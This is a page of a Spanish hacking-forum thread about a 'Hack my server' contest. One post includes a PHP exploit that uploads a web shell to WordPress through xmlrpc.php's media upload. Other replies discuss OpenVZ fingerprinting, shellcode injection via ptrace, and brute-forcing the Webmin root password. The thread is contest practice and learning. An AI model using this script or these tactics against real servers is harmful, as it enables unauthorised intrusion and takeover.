elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Hack my server II
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [16] 17 18 19 Ir Abajo Respuesta Imprimir
Autor Tema: Hack my server II  (Leído 87,652 veces)
dRak0

Desconectado Desconectado

Mensajes: 234


Ver Perfil WWW
Re: Hack my server II
« Respuesta #150 en: 3 Agosto 2014, 04:21 am »

Bueno , voy a explicar algo que desconocia y que descubri buscando formas diferentes de subir shell.


Luego de poder entrar via SQLi ya sea desde el wordpress o el phpmyadmin ,empeze a buscar otras formas. Leyendo el source de wordpress , encontre un archivo muy lindo llamado xmlrpc.php(No lo pongo porque no me deja poner mucho texto)

Despues de leerlo todo , no lo podia creer lo servido que estaba.

Observemos esta funcion:


Código
  1. /* metaweblog.newMediaObject uploads a file, following your settings */
  2. function mw_newMediaObject($args) {
  3. // adapted from a patch by Johann Richard
  4. // http://mycvs.org/archives/2004/06/30/file-upload-to-wordpress-in-ecto/
  5.  
  6. global $wpdb;
  7.  
  8. $blog_ID     = $wpdb->escape($args[0]);
  9. $user_login  = $wpdb->escape($args[1]);
  10. $user_pass   = $wpdb->escape($args[2]);
  11. $data        = $args[3];
  12.  
  13. $name = $data['name'];
  14. $type = $data['type'];
  15. $bits = $data['bits'];
  16.  
  17. logIO('O', '(MW) Received '.strlen($bits).' bytes');
  18.  
  19. if ( !$this->login_pass_ok($user_login, $user_pass) )
  20. return $this->error;
  21.  
  22. set_current_user(0, $user_login);
  23. if ( !current_user_can('upload_files') ) {
  24. logIO('O', '(MW) User does not have upload_files capability');
  25. $this->error = new IXR_Error(401, 'You are not allowed to upload files to this site.');
  26. return $this->error;
  27. }
  28.  
  29. $upload = wp_upload_bits($name, $type, $bits);
  30. if ( ! empty($upload['error']) ) {
  31. logIO('O', '(MW) Could not write file '.$name);
  32. return new IXR_Error(500, 'Could not write file '.$name);
  33. }
  34.  
  35. return array('url' => $upload['url']);
  36. }
  37.  
  38.  
  39.  

Sisi muchachos , hace un upload! Entonces simplemente creo un exploit...

Código
  1. <?php
  2. include_once("class-IXR.php");
  3.  
  4. echo "Exploit para concurso de elhacker.net";
  5.  
  6. $cliente=new IXR_CLIENT('http://IP/xmlrpc.php');
  7.  
  8. $tamano=filesize('shell.php');
  9. $archivo=fopen('shell.php','rb');
  10. $data=fread($archivo,$tamano);
  11. fclose($archivo);
  12.  
  13. $shell=array(
  14. 'name'=>"shell.php",
  15. 'type'=>"application/php",
  16. 'bits'=>new IXR_Base64($data)
  17. );
  18.  
  19. $cliente->query('metaWeblog.newMediaObject',array(
  20. 0,
  21. "ret2libc",
  22. "password",
  23. $shell
  24. ));
  25.  
  26. print_r($cliente->getResponse());
  27.  
  28. echo "Check bitch!";
  29.  
  30.  
  31.  
  32.  
  33. ?>
  34.  
  35.  

Class-IXR.php lo pueden encontrar en wordpress. No lo voy a postear.

Bueno , aprendi algo nuevo y lo comparto.Y encima repase algo de php que estaba bastante oxidado.
« Última modificación: 3 Agosto 2014, 04:37 am por ret2libc » En línea

dRak0

Desconectado Desconectado

Mensajes: 234


Ver Perfil WWW
Re: Hack my server II
« Respuesta #151 en: 3 Agosto 2014, 08:39 am »

/vz/vms/84472/private on / type simfs (rw,relatime)
proc on /proc type proc (rw,relatime)
sysfs on /sys type sysfs (rw,relatime)
none on /dev/pts type devpts (rw,nosuid,noexec,relatime,mode=600,ptmxmode=000)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,nosuid,nodev,noexec,relatime)
none on /sys/fs/cgroup type tmpfs (rw,relatime,size=4k,mode=755)
none on /run type tmpfs (rw,nosuid,noexec,relatime,size=104860k,mode=755)
none on /dev/shm type tmpfs (rw,relatime)
none on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
none on /run/shm type tmpfs (rw,nosuid,nodev,relatime)
none on /run/user type tmpfs (rw,nosuid,nodev,noexec,relatime,size=102400k,mode=755)

En línea

MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.529


I'm fourth.


Ver Perfil WWW
Re: Hack my server II
« Respuesta #152 en: 3 Agosto 2014, 09:06 am »

/vz/vms/84472/private on / type simfs (rw,relatime)
proc on /proc type proc (rw,relatime)
sysfs on /sys type sysfs (rw,relatime)
none on /dev/pts type devpts (rw,nosuid,noexec,relatime,mode=600,ptmxmode=000)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,nosuid,nodev,noexec,relatime)
none on /sys/fs/cgroup type tmpfs (rw,relatime,size=4k,mode=755)
none on /run type tmpfs (rw,nosuid,noexec,relatime,size=104860k,mode=755)
none on /dev/shm type tmpfs (rw,relatime)
none on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
none on /run/shm type tmpfs (rw,nosuid,nodev,relatime)
none on /run/user type tmpfs (rw,nosuid,nodev,noexec,relatime,size=102400k,mode=755)



:O Me parece que esto explica porque uname -a nos devuelve que es Red Hat XD.
En línea

dRak0

Desconectado Desconectado

Mensajes: 234


Ver Perfil WWW
Re: Hack my server II
« Respuesta #153 en: 3 Agosto 2014, 09:29 am »

Pregunta : ¿Hay alguna forma de crear un hilo en un proceso remoto como en windows?Me refiero a CreateRemoteThread() . Tratar de escribir en un proceso remoto que sea root y ejecutar un createremotethread desde el lugar que escribimos en ese proceso remoto y asi ejecutar una shellcode.

Esto lo hize en windows , no tengo idea si se puede en GNU/Linux.
En línea

MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.529


I'm fourth.


Ver Perfil WWW
Re: Hack my server II
« Respuesta #154 en: 3 Agosto 2014, 10:39 am »

Pregunta : ¿Hay alguna forma de crear un hilo en un proceso remoto como en windows?Me refiero a CreateRemoteThread() . Tratar de escribir en un proceso remoto que sea root y ejecutar un createremotethread desde el lugar que escribimos en ese proceso remoto y asi ejecutar una shellcode.

Esto lo hize en windows , no tengo idea si se puede en GNU/Linux.

Después de 25 minutos de Jugaad, parece que no.

https://www.youtube.com/watch?v=Nm5htFWAVUE

Vaya, si puedes inyectar código en procesos que son tuyos a través de ptrace() pero no puedes inyectar a un proceso del root. Y también tiene que estar habilitado en el kernel (en la conferencia, mencionan que ubuntu lo tiene desactivado desde la 10.04 en adelante).
En línea

Baal_30

Desconectado Desconectado

Mensajes: 248



Ver Perfil
Re: Hack my server II
« Respuesta #155 en: 3 Agosto 2014, 22:58 pm »

Veo que hemos llegado a un punto muerto, no ¿? :/

Yo sigo mirando el tema, pero uff tengo tanto por aprender!
En línea

«La suerte es el cuidado de los detalles». -Winston Churchill
xustyx

Desconectado Desconectado

Mensajes: 213


Ver Perfil
Re: Hack my server II
« Respuesta #156 en: 4 Agosto 2014, 00:10 am »

Eso parece... En parte creo que x los permisos de webmin ... Que alguien modifico.
En línea

#!drvy


Desconectado Desconectado

Mensajes: 5.855



Ver Perfil WWW
Re: Hack my server II
« Respuesta #157 en: 4 Agosto 2014, 01:15 am »

Aquí hay algo muy raro xD

uname -r
Código:
2.6.32-042stab084.14

cat /proc/version
Código:
Linux version 2.6.32-042stab084.14...

cat /etc/issue
Código:
Ubuntu 13.10 \n \l

lsb_release -a
Código:
Distributor ID: Ubuntu
Description: Ubuntu 13.10
Release: 13.10
Codename: saucy

Todo indica que es un ubuntu 13.10 (saucy) con el kernel 2.6.. sin embargo, segun ubuntu, SaucySalamander viene con el 3.11 ... Lo puedo confirmar porque me descargue la iso de 13.10 y el uname -r me tira 3.11.. la unica version de ubuntu que viene con el 2.6.32 es la 10.04 LTS -____-

http://en.wikipedia.org/wiki/List_of_Ubuntu_releases#Table_of_versions

En fin, leyendo un poco, resulta que OVH usa "distros" personalizadas:

http://serverfault.com/questions/586171/cant-update-linux-kernel-on-vps
http://forum.kimsufi.com/showthread.php?20971-weird-kernels-where-to-get-sources-for-OVH-kernels
http://forum.ovh.co.uk/showthread.php?239-Custom-kernel

Tamos jodidos xD

Saludos
« Última modificación: 4 Agosto 2014, 01:19 am por #!drvy » En línea

MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.529


I'm fourth.


Ver Perfil WWW
Re: Hack my server II
« Respuesta #158 en: 4 Agosto 2014, 02:06 am »

Aquí hay algo muy raro xD

uname -r
Código:
2.6.32-042stab084.14

cat /proc/version
Código:
Linux version 2.6.32-042stab084.14...

cat /etc/issue
Código:
Ubuntu 13.10 \n \l

lsb_release -a
Código:
Distributor ID: Ubuntu
Description: Ubuntu 13.10
Release: 13.10
Codename: saucy

Todo indica que es un ubuntu 13.10 (saucy) con el kernel 2.6.. sin embargo, segun ubuntu, SaucySalamander viene con el 3.11 ... Lo puedo confirmar porque me descargue la iso de 13.10 y el uname -r me tira 3.11.. la unica version de ubuntu que viene con el 2.6.32 es la 10.04 LTS -____-

http://en.wikipedia.org/wiki/List_of_Ubuntu_releases#Table_of_versions

En fin, leyendo un poco, resulta que OVH usa "distros" personalizadas:

http://serverfault.com/questions/586171/cant-update-linux-kernel-on-vps
http://forum.kimsufi.com/showthread.php?20971-weird-kernels-where-to-get-sources-for-OVH-kernels
http://forum.ovh.co.uk/showthread.php?239-Custom-kernel

Tamos jodidos xD

Saludos

Lo que pasa es que está usando un sistema virtualizado, OVH aquí está usando OpenVz (hay otros sistemas en OVH). Si te das cuenta en el /proc/mounts aparece la ruta del disco duro del sistema virtualizado en el host. Lo ha puesto ret2libc.

http://en.wikipedia.org/wiki/OpenVZ

Encontre un exploit que podría funcionar, salio hace un mes, el problema es que necesito compilarlo ahí en el host xD y otros pequeños detalles también.

Voy a intentar a hacer brute force al webmin con root a ver si tiene una contraseña débil.

Edit: Error - Access denied for x.x.x.x. The host has been blocked because of too many authentication failures. NOUP.
« Última modificación: 4 Agosto 2014, 02:22 am por MinusFour » En línea

#!drvy


Desconectado Desconectado

Mensajes: 5.855



Ver Perfil WWW
Re: Hack my server II
« Respuesta #159 en: 4 Agosto 2014, 02:09 am »

Hmm cierto, no me había fijado en el post ..

Saludos
En línea

Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [16] 17 18 19 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Counter Strike 1.5 Hack Server
Juegos y Consolas
*StoW* 0 3,689 Último mensaje 19 Octubre 2006, 22:22 pm
por *StoW*
Internal Server Error(hack web cross)
WarZone
Angbroda 5 6,426 Último mensaje 3 Marzo 2009, 17:39 pm
por © Shadoweps ツ
Torneo Hack my Server « 1 2 ... 6 7 »
Foro Libre
dimitrix 62 23,191 Último mensaje 1 Agosto 2014, 03:04 am
por dimitrix
Hack My Server III « 1 2 »
Foro Libre
dimitrix 16 6,667 Último mensaje 30 Marzo 2015, 18:47 pm
por elmatador2
Hack my server 2018 « 1 2 »
Hacking
dimitrix 16 19,818 Último mensaje 28 Mayo 2018, 22:06 pm
por hitori batusai
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines